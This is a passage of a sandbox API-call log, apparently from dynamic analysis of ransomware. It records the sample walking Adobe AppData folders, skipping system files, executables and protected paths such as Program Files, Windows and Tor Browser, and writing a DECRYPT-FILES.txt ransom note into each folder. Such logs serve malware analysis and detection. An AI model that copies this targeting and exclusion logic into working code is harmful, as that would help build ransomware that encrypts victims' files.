HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.zd8gx"), dwFlags=0x0) returned 1 [0076.888] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.888] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.889] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.890] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa007fa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.890] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.890] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa007fa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.890] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.890] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.890] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.891] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.891] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.891] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.891] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.891] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.891] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.891] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.891] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.891] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.891] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.891] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.891] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.891] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0076.891] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.891] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0076.891] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\jkbimi8.tmp" [0076.891] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.891] CloseHandle (hObject=0x0) returned 0 [0076.891] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.892] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa007fa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.892] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0076.892] CloseHandle (hObject=0x460) returned 1 [0076.892] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fbbce0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9fbbce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9fbbce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.892] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.892] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fbbce0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9fbbce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9fbbce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.892] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.892] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.892] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.892] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.892] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.892] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.892] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0076.892] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.892] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" [0076.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\jkbimi8.tmp" [0076.893] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.893] CloseHandle (hObject=0x0) returned 0 [0076.893] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.893] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fbbce0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9fbbce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9fbbce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.893] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0076.893] CloseHandle (hObject=0x458) returned 1 [0076.893] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda8cdc00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda8cdc00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security\\", cAlternateFileName="")) returned 0 [0076.894] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0076.894] CloseHandle (hObject=0x450) returned 1 [0076.894] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.894] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.894] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.894] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.894] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.894] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.894] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.894] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.894] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0076.894] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.894] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\" [0076.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\jkbimi8.tmp" [0076.894] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.895] CloseHandle (hObject=0x0) returned 0 [0076.895] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.895] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.895] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0076.895] CloseHandle (hObject=0x448) returned 1 [0076.895] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.895] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.895] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0076.895] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0076.895] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0076.895] lstrcatW (in: lpString1="Flash Player", lpString2="\\" | out: lpString1="Flash Player\\") returned="Flash Player\\" [0076.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Flash Player\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\" [0076.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Program Files") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch=":\\Windows") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Games\\") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\All Users") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="AhnLab") returned 0x0 [0076.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0076.896] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.896] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\\\jkbimi8.tmp") returned 77 [0076.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0076.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0076.902] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.902] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\\\DECRYPT-FILES.txt") returned 83 [0076.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0076.902] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0076.903] CloseHandle (hObject=0x44c) returned 1 [0076.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0076.904] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0076.904] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0a0520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0a0520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0076.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.904] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0a0520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0a0520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.904] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetCache", cAlternateFileName="ASSETC~1")) returned 1 [0076.904] lstrcmpW (lpString1="AssetCache", lpString2=".") returned 1 [0076.904] lstrcmpW (lpString1="AssetCache", lpString2="..") returned 1 [0076.904] lstrcatW (in: lpString1="AssetCache", lpString2="\\" | out: lpString1="AssetCache\\") returned="AssetCache\\" [0076.904] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="AssetCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Program Files") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch=":\\Windows") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Games\\") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\cache2\\entries\\") 